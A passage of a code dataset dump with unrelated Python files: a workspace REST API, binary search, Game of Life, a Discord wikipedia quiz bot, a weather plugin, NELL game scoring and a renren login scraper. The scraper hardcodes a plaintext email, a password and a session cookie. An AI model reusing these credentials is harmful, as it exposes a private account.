int(request.GET.get('limit'))\n\t\n\tworkspaces = repo.Workspace(db_session).get_by_owner(user_name)\n\t#paging by code (discrete values)\n\ttotal = len(workspaces)\n\tlimit = start + limit\n\t\n\t#order by date\n\tsort_ws = sorted(workspaces, key=lambda n: n.date, reverse=True)\n\t\n\to = map(lambda ws: vo.workspace(ws), sort_ws[start:limit])\n\treturn vo.collection(o, total)\n\n#CRUD\n@post('workspace')\n@rest_method\ndef create():\n\to = json.load(request.body)\n\tuser_name = o['userName']\n\tname = o['name']\n\tdescription = o['description']\n\tlayers = o['layers']\n\tpoint = o['point']\n\toverlays = o['overlays']\n\tbaselayer = o['baselayer']\n\tuser_name = o['userName']\n\n\tws = model.Workspace()\n\tws.name = name\n\tws.description = description\n\tws.layers = layers\n\tws.overlays = overlays\n\tws.baselayer = baselayer\n\tws.user_name = user_name\n\tws.point = WKTSpatialElement(Point(point['x'], point['y']).wkt,96)\n\tws.public = True\n\tws.date = 
datetime.now()\n\t\n\trepo.Workspace(db_session).create_update(ws)\n\n\trepo_user = repo.User(db_session)\n\tuser = repo_user.read(user_name)\n\tuser.workspaces.append(ws)\n\trepo_user.create_update(user)\n\treturn vo.success(True)\n\n@get('workspace/:id')\n@rest_method\ndef read(id):\n\tws = repo.Workspace(db_session).read(id)\n\to = vo.workspace(ws) if ws else ''\n\treturn o\n\n@put('workspace')\n@rest_method\ndef update():\n\to = json.load(request.body)\n\tid = o['id']\n\tname = o['name']\n\tdescription = o['description']\n\tlayers = o['layers']\n\tpoint = o['point']\n\toverlays = o['overlays']\n\tbaselayer = o['baselayer']\n\n\trepo_ws = repo.Workspace(db_session)\n\tws = repo_ws.read(id)\n\t\n\tws.name = name\n\tws.description = description\n\tws.layers = layers\n\tws.overlays = overlays\n\tws.baselayer = baselayer\n\tws.point = WKTSpatialElement(Point(point['x'], point['y']).wkt,96)\n\tws.public = True\n\tws.date = datetime.now()\n\t\n\trepo_ws.create_update(ws)\n\treturn vo.success(True)\n\n@delete('workspace/:id')\n@rest_method\ndef delete(id):\n\trepo_ws= repo.Workspace(db_session)\n\tws = repo_ws.read(id)\n\trepo_ws.delete(ws)\n\treturn vo.success(True)\n\n\n@get('workspace/getusers')\n@rest_method\ndef get_users():\n\tid = int(request.GET.get('id'))\n\tstart = int(request.GET.get('start'))\n\tlimit = int(request.GET.get('limit'))\n\n\tworkspace = repo.Workspace(db_session).read(id)\n\tusers = workspace.users\n\t\n\t#paging by code (discrete values)\n\ttotal = len(users)\n\tlimit = start + limit\n\n\to = map(lambda u: vo.user(u), users[start:limit])\n\treturn vo.collection(o, total)\n\t\n\n@post('workspace/addusers')\n@rest_method\ndef add_users():\n\to = json.load(request.body)\n\tid = o[\"id\"]\n\tuser_names = o[\"userNames\"]\n\n\trepo_workspace = repo.Workspace(db_session)\n\trepo_user = repo.User(db_session)\n\n\tworkspace = repo_workspace.read(id)\n\n\tdef add(user_name):\n\t\tu = repo_user.read(user_name)\n\t\tworkspace.users.append(u)\n\t\treturn True\n\n\tmap(lambda user_name: add(user_name), user_names)\n\t\n\trepo_workspace.create_update(workspace)\n\treturn vo.action(True)\n\n@post('workspace/removeusers')\n@rest_method\ndef remove_users():\n\to = json.load(request.body)\n\tid = o[\"id\"]\n\tuser_names = o[\"userNames\"]\n\n\trepo_workspace = repo.Workspace(db_session)\n\trepo_user = repo.User(db_session)\n\n\tworkspace = repo_workspace.read(id)\n\n\tdef remove(user_name):\n\t\tu = repo_user.read(user_name)\n\t\tif(u in workspace.users):\n\t\t\tworkspace.users.remove(u)\n\t\treturn True\n\n\tmap(lambda user_name: remove(user_name), user_names)\n\n\trepo_workspace.create_update(workspace)\n\treturn vo.action(True)","sub_path":"src/server/lib/phi/rest/workspace.py","file_name":"workspace.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"445755703","text":"\"\"\"\nBinary search\n\nReferences:\n- https://en.wikipedia.org/wiki/Binary_search_algorithm\n\"\"\"\n\n\ndef binary_search(arr, target):\n \"\"\"\n arr must be sorted, O(nlogn)\n given an array and a target value, return the index\n returns -1 if the target is not present\n\n Best case: O(1)\n Worst case: O(log n)\n Worst case space: O(1)\n \"\"\"\n low = 0\n high = len(arr) - 1\n while low <= high:\n mid = (low + high) // 2\n if target > arr[mid]:\n low = mid + 1\n elif target < arr[mid]:\n high = mid - 1\n else:\n return mid\n return -1\n\n # replace with this line for nearest\n # return low if arr[low] - target < 
target - arr[high] else high\n\n\ndef binary_search_recur(arr, low, high, num):\n    \"\"\"\n    recursive variant of binary search\n    \"\"\"\n    if low > high: # error case\n        return -1\n    mid = (low + high) // 2\n    if num < arr[mid]:\n        return binary_search_recur(arr, low, mid - 1, num)\n    if num > arr[mid]:\n        return binary_search_recur(arr, mid + 1, high, num)\n    return mid\n\n\ndef test():\n    \"\"\"run test cases\"\"\"\n    tests = (\n        ([1, 2, 4, 7, 9, 11], 5, -1),\n        ([3, 5, 7, 8, 9, 10], 3, 0),\n        ([1, 5, 8, 10], 0, -1),\n        ([1, 5, 8, 10], 5, 1),\n    )\n    for *args, result in tests:\n        assert binary_search(*args) == result\n\n\nif __name__ == \"__main__\":\n    test()\n","sub_path":"dsa/search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"560502609","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport tkinter as tk\n\n\nclass GameOfLife(tk.Tk):\n    def __init__(self, parent):\n        tk.Tk.__init__(self, parent)\n        self.parent = parent\n        self.geometry(\"800x600+100+100\")\n        self.title(\"Conway's Game Of Life\")\n        self.size = 80\n        self.cell_sz = 5\n        self.colors = {0: \"#1f2433\", 1: \"#2ab922\"}\n        self.grid = [[0 for i in range(self.size)] for i in range(self.size)]\n        self.generation_nb = tk.IntVar(value=0)\n        self.initUi()\n        self.cells = self.initCells()\n        self.animation_on = False\n        # event bindings: left click toggles a cell, motion previews it, space toggles the animation\n        self.can.bind(\"<Button-1>\", self.click)\n        self.can.bind(\"<Motion>\", self.move)\n        self.can.bind(\"<Leave>\", lambda evt: self.can.delete(\"preview\"))\n        self.bind(\"<space>\", self.toggleAnimation_space)\n\n    def initUi(self):\n        # Canvas\n        self.can_fr = tk.Frame(self, height=400)\n        self.can_fr.grid(row=0, column=0)\n\n        self.can = tk.Canvas(\n            self.can_fr, width=400, height=400, bg=self.colors[0])\n        self.can.grid()\n\n        # Generation number display\n        self.data_fr = tk.Frame(self, height=100, padx=20, pady=20)\n        self.data_fr.grid(row=1, column=0)\n\n        self.generation_nb_ent = tk.Entry(\n            self.data_fr,\n            textvariable=self.generation_nb,\n            width=6,\n            state=tk.DISABLED,\n            bg=\"white\")\n        self.generation_nb_ent.grid(row=0, column=0)\n\n        # Commands : play/pause, step, clear\n        self.cmd_fr = tk.Frame(self, height=100)\n        self.cmd_fr.grid(row=2, column=0)\n\n        self.bt_clear = tk.Button(\n            self.cmd_fr, text=\"Clear\", command=self.clear)\n        self.bt_clear.grid(row=0, column=0)\n\n        self.bt_play = tk.Button(\n            self.cmd_fr, text=\"Play\", command=self.toggleAnimation_button)\n        self.bt_play.grid(row=0, column=1)\n\n        self.bt_step = tk.Button(self.cmd_fr, text=\"Step +1\", command=self.step)\n        self.bt_step.grid(row=0, column=2)\n\n    def initCells(self):\n        cells = []\n        for x in range(self.size):\n            line = []\n            for y in range(self.size):\n                line.append(\n                    self.can.create_rectangle(\n                        y * self.cell_sz,\n                        x * self.cell_sz,\n                        y * self.cell_sz + self.cell_sz,\n                        x * self.cell_sz + self.cell_sz,\n                        fill=self.colors[self.grid[x][y]]\n                    )\n                )\n            cells.append(line)\n        return cells\n\n    def click(self, evt):\n        x, y = evt.y // self.cell_sz, evt.x // self.cell_sz\n        self.grid[x][y] = {0: 1, 1: 0}[self.grid[x][y]]\n        self.can.itemconfigure(\n            self.cells[x][y], fill=self.colors[self.grid[x][y]])\n\n    def move(self, evt):\n        x, y = evt.y // self.cell_sz, evt.x // self.cell_sz\n        self.can.delete(\"preview\")\n        self.can.create_rectangle(\n            y * self.cell_sz,\n            x * self.cell_sz,\n            y * self.cell_sz + self.cell_sz,\n            x * self.cell_sz + self.cell_sz,\n            fill=\"white\",\n            tag=\"preview\"\n        )\n\n    def clear(self):\n        self.animation_on = False\n        self.bt_play.configure(text=\">\")\n        self.grid = [[0 
for i in range(self.size)] for i in range(self.size)]\n        self.generation_nb.set(0)\n        for x in range(self.size):\n            for y in range(self.size):\n                self.can.itemconfigure(self.cells[x][y], fill=self.colors[0])\n\n    def copyGrid(self, grid):\n        new_grid = []\n        for x in range(len(grid)):\n            line = []\n            for y in range(len(grid[x])):\n                line.append(grid[x][y])\n            new_grid.append(line)\n        return new_grid\n\n    def inBoundaries(self, x, y):\n        return x in range(self.size) and y in range(self.size)\n\n    def countNeighbrs(self, grid, x, y):\n        count = 0\n        for n in [\n            (-1, -1), (-1, 0), (-1, 1),\n            (0, -1), (0, 1),\n            (1, -1), (1, 0), (1, 1)\n        ]:\n            if self.inBoundaries(x + n[0], y + n[1]):\n                if grid[x + n[0]][y + n[1]] == 1:\n                    count += 1\n        return count\n\n    def toggleAnimation_space(self, evt):\n        self.animation_on = not self.animation_on\n        if self.animation_on:\n            self.animate()\n            self.bt_play.configure(text=\"||\")\n        else:\n            self.bt_play.configure(text=\">\")\n\n    def toggleAnimation_button(self):\n        self.animation_on = not self.animation_on\n        if self.animation_on:\n            self.animate()\n            self.bt_play.configure(text=\"||\")\n        else:\n            self.bt_play.configure(text=\">\")\n\n    def animate(self):\n        if self.animation_on:\n            self.can.delete(\"preview\")\n            new_grid = self.copyGrid(self.grid)\n            for x in range(self.size):\n                for y in range(self.size):\n                    neighbrs = self.countNeighbrs(self.grid, x, y)\n                    if self.grid[x][y] == 0 and neighbrs == 3:\n                        new_grid[x][y] = 1\n                        self.can.itemconfigure(\n                            self.cells[x][y], fill=self.colors[1])\n                    elif self.grid[x][y] == 1 and neighbrs not in range(2, 4):\n                        new_grid[x][y] = 0\n                        self.can.itemconfigure(\n                            self.cells[x][y], fill=self.colors[0])\n            self.grid = self.copyGrid(new_grid)\n            self.generation_nb.set(self.generation_nb.get() + 1)\n            self.after(50, self.animate)\n\n    def step(self):\n        self.animation_on = False\n        self.can.delete(\"preview\")\n        new_grid = self.copyGrid(self.grid)\n        for x in range(self.size):\n            for y in range(self.size):\n                neighbrs = self.countNeighbrs(self.grid, x, y)\n                if self.grid[x][y] == 0:\n                    if neighbrs == 3:\n                        new_grid[x][y] = 1\n                        self.can.itemconfigure(\n                            self.cells[x][y], fill=self.colors[1])\n                else:\n                    if neighbrs not in range(2, 4):\n                        new_grid[x][y] = 0\n                        self.can.itemconfigure(\n                            self.cells[x][y], fill=self.colors[0]\n                        )\n        self.grid = self.copyGrid(new_grid)\n        self.generation_nb.set(self.generation_nb.get() + 1)\n\n    def debug(self, evt):\n        x, y = evt.y // self.cell_sz, evt.x // self.cell_sz\n        print(self.countNeighbrs(self.grid, x, y))\n\n\nif __name__ == \"__main__\":\n    app = GameOfLife(None)\n    app.mainloop()\n","sub_path":"game_of_life.py","file_name":"game_of_life.py","file_ext":"py","file_size_in_byte":6714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"440224903","text":"#!/usr/bin/env python3\n# -*- coding: iso-8859-1 -*-\n# -*- coding: latin-1 -*-\n# & Loreto Notarantonio 2015, October\n# ######################################################################################\n\nimport pyudev # sudo pip3.4 --proxy=localhost:60080 install pyudev\n\n# ##########################################################################\n# # setupRS485(usbDevice)\n# ##########################################################################\ndef isUsbDevice(usbDevName):\n    usbDevPath = None\n\n    if usbDevName:\n        usbDevName = usbDevName.split('/')[-1] # in case the full path was passed, keep only the device name\n        context = pyudev.Context()\n\n\n    try:\n        usbDevPath = '/dev/' + usbDevName\n        isVaildDevice = pyudev.Device.from_device_file(context, 
usbDevPath) == (pyudev.Device.from_name(context, 'tty', usbDevName))\n except:\n isVaildDevice = False\n usbDevPath = None\n # print('{0} - is not a valid USB device'.format(usbDevPath))\n # sys.exit()\n\n # print (isVaildDevice)\n return usbDevPath\n\n","sub_path":"Devices/isUsbDevice.py","file_name":"isUsbDevice.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"148838664","text":"from __future__ import print_function\nfrom app import mongo\nfrom random import randint\nimport sys\n\n#addFeedback(identifications, updates, gameType): void\n#calculateScores(data1, data2, category, gameType): int, int\n#askNell(entity): list\n#existsInNell(entity, category): tuple(bool, float)\n#generateData(identifications, uniqueKey, sortCriteria, maxValues): list\n#pickRandomFeedback(identifications, sortCriteria, maxValues): dict\n\n#initial identifications: entity, category\n#initial updates: score, count\ndef addFeedback(identifications, updates, gameType):\n\tupdates[\"isInNell\"] = (updates[\"score\"] != -1 and not updates[\"lazy\"])\n\tcursor = mongo.db.feedbacks.find(identifications)\n\tif cursor.count() > 0:\n\t\tupdates[\"count\"] += cursor[0][\"count\"]\n\t\tmongo.db.feedbacks.update_one(identifications, {\"$set\": updates})\n\telse:\n\t\tupdates[\"gameType\"] = gameType\n\t\tmongo.db.feedbacks.insert_one(dict(identifications.items() + updates.items()))\n\ndef askNell(entity):\n\timport json\n\timport urllib2\n\toccurrences = []\n\turl = 'http://rtw.ml.cmu.edu/rtw/api/json0?lit1=' + entity.replace(\" \", \"+\") + '&predicate=*'\n\tjson_dict = json.load(urllib2.urlopen(url))\n\tif \"items\" in json_dict.keys():\n\t\tfor i in json_dict[\"items\"]:\n\t\t\tif \"predicate\" in i.keys():\n\t\t\t\tif \"justifications\" in i.keys() and len(i[\"justifications\"]) >= 1 and \"score\" in i[\"justifications\"][0].keys():\n\t\t\t\t\toccurrences.append((i[\"predicate\"], i[\"justifications\"][0][\"score\"]))\n\treturn occurrences\n\ndef existsInNell(entity, category):\n\t#communicate with ask nell, returns the list of occurrences of entity\n\toccurrences = askNell(entity)\n\tfor o in occurrences:\n\t\tif str(o[0]) == category:\n\t\t\treturn True, float(o[1])\n\treturn False, -1\n\ndef calculateScores(player1, player2, category, gameType):\n\tif gameType == 1:\n\t\tscore1, score2 = 0, 0\n\t\tfor e in player1:\n\t\t\tif e != \"\":\n\t\t\t\texists, score = existsInNell(e, category)\n\t\t\t\tidentifications = dict()\n\t\t\t\tidentifications[\"entity\"] = e\n\t\t\t\tidentifications[\"category\"] = category\n\t\t\t\tupdates = dict()\n\t\t\t\tupdates[\"lazy\"] = False\n\t\t\t\tif exists:\n\t\t\t\t\tupdates[\"score\"] = score\n\t\t\t\t\tif score > 0.7:\n\t\t\t\t\t\tif e in player2:\n\t\t\t\t\t\t\tupdates[\"count\"] = 2\n\t\t\t\t\t\t\tscore1 += 10\n\t\t\t\t\t\t\tscore2 += 10\n\t\t\t\t\t\t\tplayer2.remove(e)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tupdates[\"count\"] = 1\n\t\t\t\t\t\t\tscore1 += 4\n\t\t\t\t\telse:\n\t\t\t\t\t\tif e in player2:\n\t\t\t\t\t\t\tupdates[\"count\"] = 2\n\t\t\t\t\t\t\tscore1 += 12\n\t\t\t\t\t\t\tscore2 += 12\n\t\t\t\t\t\t\tplayer2.remove(e)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tupdates[\"count\"] = 1\n\t\t\t\t\t\t\tscore1 += 7\n\t\t\t\telse:\n\t\t\t\t\tupdates[\"score\"] = -1\n\t\t\t\t\tif e in player2:\n\t\t\t\t\t\tupdates[\"count\"] = 2\n\t\t\t\t\t\tscore1 += 15\n\t\t\t\t\t\tscore2 += 15\n\t\t\t\t\t\tplayer2.remove(e)\n\t\t\t\t\telse:\n\t\t\t\t\t\tupdates[\"count\"] = 1\n\t\t\t\t\t\tscore1 += 
2\n\t\t\t\taddFeedback(identifications, updates, gameType)\n\n\t\tfor e in player2:\n\t\t\tif e != \"\":\n\t\t\t\texists, score = existsInNell(e, category)\n\t\t\t\tidentifications = dict()\n\t\t\t\tidentifications[\"entity\"] = e\n\t\t\t\tidentifications[\"category\"] = category\n\t\t\t\tupdates = dict()\n\t\t\t\tupdates[\"lazy\"] = False\n\t\t\t\tupdates[\"count\"] = 1\n\t\t\t\tif exists:\n\t\t\t\t\tupdates[\"score\"] = score\n\t\t\t\t\tif score > 0.7:\n\t\t\t\t\t\tscore2 += 4\n\t\t\t\t\telse:\n\t\t\t\t\t\tscore2 += 7\n\t\t\t\telse:\n\t\t\t\t\tupdates[\"score\"] = -1\n\t\t\t\t\tscore2 += 2\n\t\t\t\taddFeedback(identifications, updates, gameType)\n\n\t\treturn score1, score2\n\treturn -1, -1\n\ndef generateData(identifications, sortCriteria, maxValues):\n\tcursor = mongo.db.feedbacks.find(identifications).sort(sortCriteria)\n\tdata = []\n\tif cursor.count() > 0:\n\t\tfor i in range(min(maxValues, cursor.count())): \n\t\t\tdata.append(str(cursor[i][\"entity\"]))\n\treturn data\n\ndef pickRandomFeedback(identifications, sortCriteria, maxValues):\n\tdata = generateData(identifications, sortCriteria, maxValues)\n\trand = randint(0, len(data) - 1)\n\treturn data[rand]\n\n","sub_path":"rtw.py","file_name":"rtw.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"630109230","text":"import discord\r\nfrom discord.ext import commands\r\nimport random\r\nimport wikipedia\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs4\r\n\r\n\r\nclass QuizCog(commands.Cog):\r\n \"\"\"\r\n クイズボット\r\n \"\"\"\r\n\r\n wikipedia.set_lang(\"ja\")\r\n\r\n wikipedia_page = wikipedia.page(\"wikipedia\")\r\n wordlist = []\r\n\r\n @commands.group(aliases=['q'])\r\n async def quiz_wikipedia(self, ctx):\r\n \"\"\"wikipedia問題\"\"\"\r\n if ctx.invoked_subcommand is None:\r\n embed = discord.Embed(\r\n title=\"wikipediaクイズ機能\",\r\n description=\"wikipediaクイズ機能の使い方です。\"\r\n )\r\n\r\n embed.add_field(\r\n name=\"get\", value=\"wikipediaからランダムなページを取得する\\n e.q get\", inline=False)\r\n embed.add_field(\r\n name=\"one\", value=\"取得中のwikipediaページの一行目を表示する\\n e.q one\", inline=False)\r\n embed.add_field(\r\n name=\"summary\", value=\"取得中のwikipediaページのサマリーを表示する\\n e.q summary\", inline=False)\r\n embed.add_field(\r\n name=\"answer [, True]\",\r\n value=\"取得中のwikipediaページのタイトルを表示する\\nTrueをつけると隠し文字で表示する\\n e.q answer\", inline=False)\r\n embed.add_field(\r\n name=\"url\", value=\"取得中のwikipediaページのurlを表示する\\n e.q url\", inline=False)\r\n embed.add_field(\r\n name=\"find\", value=\"指定した単語のwikipediaのページを取得する\\n e.q find 'target-word'\", inline=False)\r\n embed.add_field(\r\n name=\"create_list (history|science|etc...)\", value=\"単語帳を作成する\\n e.q cl history\", inline=False)\r\n embed.add_field(\r\n name=\"get_in_list\", value=\"単語帳からランダムな単語のwikipediaページを取得する\\n e.q gil\", inline=False)\r\n embed.add_field(\r\n name=\"hint\", value=\"現在取得しているwikipediaのタイトル単語の文字ヒントを出す\\n e.q hint (wo1|se2)\", inline=False)\r\n\r\n await ctx.send(embed=embed)\r\n\r\n @quiz_wikipedia.command(aliases=['get', 'g'])\r\n async def get_random_wikipedia_page(self, ctx):\r\n \"\"\"wikipediaからランダムな記事を一つ取得する\"\"\"\r\n\r\n await ctx.send(\"妹「wikipediaからランダムな記事を取ってくるね!」\")\r\n await ctx.send(\"妹は中空に手を翳し、何かを掴むような動作をしている。\")\r\n\r\n # 日本語wikipediaからランダムな単語を一つ決めてページを取得する\r\n self.wikipedia_page = wikipedia.page(wikipedia.random())\r\n\r\n await ctx.send(\"妹「ランダムな記事を取ってきたよ!」\")\r\n\r\n def do_hide_words(self, s: str):\r\n \"\"\"答えがそのまま記載されている場合が多いので、マスクする\"\"\"\r\n\r\n 
hide_words = [self.wikipedia_page.title]\r\n        space_word = s[:s.find("(")]\r\n        hide_words.append(space_word)\r\n        hide_words.append(\r\n            self.wikipedia_page.title.replace(" ", ""))  # let "霧雨 魔理沙" also match as "霧雨魔理沙" (title without spaces)\r\n        # extract the reading inside the parentheses, e.g. the "パイソン" in "Python(パイソン)は、..."\r\n        # for "ウォルト・ディズニー(Walt Disney, 1901年12月5日 - 1966年12月15日)..." we do not want to strip the dates, so stop at the first punctuation mark\r\n        punctuation_mark = [",", "、"]\r\n        start_parentheses = s.find("(")\r\n        end_parentheses = s.find(")")\r\n        end_para = end_parentheses\r\n        for mark in punctuation_mark:\r\n            mark_position = s.find(mark)\r\n            if start_parentheses < mark_position < end_parentheses:\r\n                end_para = mark_position\r\n        para_title = s[s.find("(") + 1: end_para]\r\n\r\n        hide_words.append(para_title)\r\n\r\n        # mask every answer word with **ANSWER**\r\n        for hide_word in hide_words:\r\n            s = s.replace(hide_word, "**ANSWER**")\r\n\r\n        return s\r\n\r\n    @quiz_wikipedia.command(aliases=['one', 'o'])\r\n    async def print_one_summary(self, ctx):\r\n        """Show the first line of the summary"""\r\n        s = self.wikipedia_page.summary  # fetch the summary first\r\n        one_line = s[:s.find("\\n")]  # keep everything up to the first newline\r\n\r\n        # the answer itself is often written verbatim, so mask it\r\n        question_sentence = self.do_hide_words(one_line)\r\n\r\n        await ctx.send(question_sentence)\r\n\r\n    @quiz_wikipedia.command(aliases=['summary', 's'])\r\n    async def print_summary(self, ctx):\r\n        """Show the summary"""\r\n        summary = self.wikipedia_page.summary\r\n        question_sentence = self.do_hide_words(summary)\r\n        await ctx.send(question_sentence)\r\n\r\n    @quiz_wikipedia.command(aliases=['answer', 'title', 'a'])\r\n    async def print_answer(self, ctx, spoiler=False):\r\n        """Show the answer"""\r\n        await ctx.send(f'妹「答えは「**{"||"*spoiler}{self.wikipedia_page.title}{"||"*spoiler}**」だよ!」')\r\n\r\n    @quiz_wikipedia.command(aliases=['url'])\r\n    async def print_url(self, ctx):\r\n        """Show the URL"""\r\n        await ctx.send(self.wikipedia_page.url)\r\n\r\n    @quiz_wikipedia.command(aliases=['find', 'page'])\r\n    async def get_wikipedia_page(self, ctx, target_word: str):\r\n        """Fetch the wikipedia page for the given word"""\r\n        self.wikipedia_page = wikipedia.page(target_word)\r\n        await ctx.send("妹「調べてきたよ!お兄ちゃん!」")\r\n\r\n    @quiz_wikipedia.command(aliases=['hint'])\r\n    async def print_hint(self, ctx, key: str):\r\n        if key.startswith("wo"):  # "woN" reveals the N-th character of the title\r\n            word_position = int(key[2:])\r\n            await ctx.send(f'妹「{word_position}文字目は「{self.wikipedia_page.title[word_position - 1]}」だよ!」')\r\n        if key == "se2":  # "se2" reveals the second line of the summary\r\n            se2 = self.wikipedia_page.summary\r\n            s1 = se2.find("\\n")\r\n            se2 = se2[s1: se2.find("\\n", s1 + 1)]\r\n            se2 = self.do_hide_words(se2)\r\n            await ctx.send("妹「サマリーの二行目は\\n「" + se2 + "\\n」だよ!」")\r\n\r\n    @quiz_wikipedia.command(aliases=['cl', 'create_list'])\r\n    async def create_wordlist(self, ctx, target: str):\r\n        await ctx.send("妹「単語帳を作るよ!」")\r\n        await ctx.send("妹は懸命にペンを動かしている。")\r\n        if target == 'history':\r\n            self.wordlist = self.get_history_words()\r\n        if target == 'science':\r\n            self.wordlist = self.get_science_words()\r\n\r\n        await ctx.send("妹「単語帳を作成したよ!」")\r\n\r\n    def get_history_words(self):\r\n        """Build the word list.\r\n\r\n        Source: the historical figures listed at 'http://socialstudies.boy.jp/page-994/'\r\n        """\r\n        url = 'http://socialstudies.boy.jp/page-994/'\r\n        page = requests.get(url)\r\n        soup = bs4(page.content, 'lxml')\r\n        tag_words = soup.find_all(class_='column-1')\r\n        words = [word.string for word in tag_words]\r\n\r\n        return words\r\n\r\n    def get_science_words(self):\r\n        """Build the word list for science terms"""\r\n\r\n        url = 'http://rikamato.com/2017/12/15/science_word/'\r\n        page = requests.get(url)\r\n        soup = bs4(page.content, 'lxml')\r\n        tag_words = soup.find_all('tr')\r\n        words = [word.text.split("\\n")[1] for word in tag_words[1:]]\r\n\r\n        return words\r\n\r\n    @quiz_wikipedia.command(aliases=['gil', 'get_in_list'])\r\n    async def get_wikipedia_page_for_wordlist(self, ctx):\r\n        """Pick a random word from the word list and fetch its wikipedia page"""\r\n\r\n        await ctx.send("妹「単語帳から適当に問題に出すね!」")\r\n        random_word = random.choice(self.wordlist)\r\n        self.wikipedia_page = wikipedia.page(random_word)\r\n        await ctx.send("妹は問題を書きとめ、あなたからの質問に応える気が十分なようだ")\r\n\r\n    @quiz_wikipedia.command(aliases=['d_show_wordlist'])\r\n    async def show_wordlist(self, ctx):\r\n        """Debug helper: inspect the wordlist.\r\n\r\n        Discord limits one message to 2000 characters, so keep the output under 2000"""\r\n        print(", ".join(self.wordlist)[:1000] + "...")\r\n","sub_path":"quizcog.py","file_name":"quizcog.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"632355274","text":"from __future__ import unicode_literals\n# don't convert to ascii in py2.7 when creating string to return\nimport yaml\nimport urllib2\nimport json\n\n# Import variables from config file\nconfig = yaml.load(open('plugins/weather.conf', 'r'))\n\nweather_url = config.get('WEATHER_URL')\n\noutputs = []\n\n\ndef get_weather(weather_url):\n    f = urllib2.urlopen(weather_url)\n    weather_json = f.read()\n    f.close()\n    w = json.loads(weather_json)\n\n    weather_forecast = str(\n        "Location: " + w['current_observation']['display_location']['full'] + "\\n" +\n        "Station: " + w['current_observation']['station_id'] + "\\n" +\n        "Current temp: " + w['current_observation']['temperature_string'] + "\\n" +\n        "Feels like: " + w['current_observation']['feelslike_string'] + "\\n" +\n        "Relative humidity: " + w['current_observation']['relative_humidity'] + "\\n" +\n        "Wind: " + w['current_observation']['wind_string'] + "\\n" +\n        "Weather: " + w['current_observation']['weather'] + "\\n"\n    )\n\n    return weather_forecast\n\ndef process_message(data):\n    if data['text'] == 'weather':\n        # Get weather and store in a variable\n        weather_forecast = get_weather(weather_url)\n\n        # Respond with weather forecast\n        outputs.append([data['channel'], weather_forecast])\n","sub_path":"docs/example-plugins/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"95088401","text":"import requests\n"""\nHow to request pages behind a login with requests:\ninstantiate a Session;\nfirst send the login request through the session, so the cookies are saved in it;\nthen request the logged-in pages with the same session, which automatically carries the cookies saved at login.\n"""\n\n\ndef str_to_dict(cookies_str):\n    cookies_dict = {i.split("=")[0]: i.split("=")[1] for i in cookies_str.split("; ")}\n    return cookies_dict\n\n\ndef main():\n    session = requests.Session()\n    login_url = 'http://www.renren.com/PLogin.do'\n    data = {\n        "email": '269524963@qq.com',\n        "password": 'aptx4869..slj'\n    }\n    headers = {\n        'User-Agent': 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Mobile Safari/537.36',\n    }\n\n    # cookie: 'anonymid=k67hxshe-1vtmfm; _r01_=1; taihe_bi_sdk_uid=b9aa06bdb29d4e402a8209714fddbd5d; depovince=ZGQT; JSESSIONID=abcX7vNjbqDJ2azTEj0ax; taihe_bi_sdk_session=511521bb980dcaa60043c170a7574553; ick_login=69707d7d-c636-40ed-ae71-046562d5ce52; id=973614509; ver=7.0; loginfrom=null; wp_fold=0; ick=f3ada514-d0de-4116-8ef8-e2670631bb99; t=42f97870e5d5a5a25df456e4dc544a2f9; societyguester=42f97870e5d5a5a25df456e4dc544a2f9; xnsid=cbd32a1b; jebecookies=a3680de3-1307-4c64-add7-aac74d259129|||||'\n    # cookie = str_to_dict(cookie)\n    # res = session.get(url=profile_url, headers=headers, cookies=cookies)\n\n    # send the login request through the session; the cookies are saved in it\n    session.post(url=login_url, data=data, headers=headers)\n    # the same session shares those cookies, so the profile page can be opened directly\n    profile_url = 'http://www.renren.com/973614509/newsfeed/photo'\n    res = session.get(url=profile_url, headers=headers)\n    with open('profile.html', 'w', encoding='utf-8') as f:\n        f.write(res.content.decode('utf-8'))\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"spider/req_session.py","file_name":"req_session.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"116512988","text":"import ase.db\nimport warnings\nimport numpy\nimport matplotlib.pyplot as plt\nfrom ase.data import covalent_radii\nfrom scipy.stats import linregress\nimport os, os.path\nfrom scipy.constants import pi, epsilon_0\n\ndb_file = "../../data/gpaw_data/c2db.db"\nif not os.path.exists(db_file):\n    raise FileExistsError(("Please download the c2db data into ../../data/gpaw_data/ folder,"\n                           "from https://cmr.fysik.dtu.dk/_downloads/c2db.db"))\n\n\ndb = ase.db.connect(db_file)\nvalence = numpy.load("../post_processing/valence.npy")\npol = numpy.load("../post_processing/valence.npy")  # NOTE: this reloads the valence table; a separate polarizability table was probably intended\n\n\ndef get_thick(atom_row):\n    pos = atom_row.positions[:, -1]\n    diff = covalent_radii[atom_row.numbers]\n    zmax = numpy.max(pos + diff) - numpy.min(pos - diff)\n    vals = valence[atom_row.numbers]  # valence electrons\n    atom_pol = pol[atom_row.numbers]\n    A = atom_row.cell_area\n    return zmax, sum(vals) / A, sum(atom_pol) / A\n\n\ndef get_data():\n    candidates = db.select(selection="gap_gw>0.5")\n    candidates = 